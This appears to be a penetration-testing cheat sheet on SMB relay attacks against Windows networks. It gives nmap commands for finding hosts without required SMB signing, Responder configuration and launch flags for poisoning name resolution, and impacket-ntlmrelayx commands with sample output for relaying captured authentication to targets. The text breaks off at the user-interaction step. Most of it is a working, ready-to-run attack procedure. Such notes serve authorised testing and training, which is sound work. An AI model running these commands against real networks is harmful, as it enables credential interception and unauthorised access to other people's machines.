# SMB Relay

## Prerequisites

### SMB Signing

SMB Signing is enabled but not required (disabled) on Windows workstations and enabled and required on Windows Servers by default.

### Nmap - SMB Security Mode Discovery

There are two nmap scripts for SMB message signing mode detection, one for SMBv1 and for SMBv2 we are going to use.

[nmap --script smb2-security-mode](https://nmap.org/nsedoc/scripts/smb2-security-mode.html)  

```bash
nmap --script smb2-security-mode.nse -p 445 127.0.0.1

...
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 12:34:56:78:9A:BC (Unknown)

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
```

Copy all targets (IPs/hostnames) into targets.txt. 

### Admin Account

A user has to be admin on the relayed machine (You can't do SMB relay without an admin account).

## Responder

### Modify Responder.conf

```bash
# locate Responder.conf
/usr/share/responder/Responder.conf
```

Disable these options

* SMB = Off
* HTTP = Off 

### Start Responder

```bash
responder -I eth0 -rdw -v
```

## NTLMN RelayX

The Relay server starts SMB and HTTP server (that's why they are disabled in the responder).

```bash
#locate ntlmrelayx
impacket-ntlmrelayx -tf ./targets.txt -smb2support

..
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
```

## User Interaction

Now a user needs to address SMB folder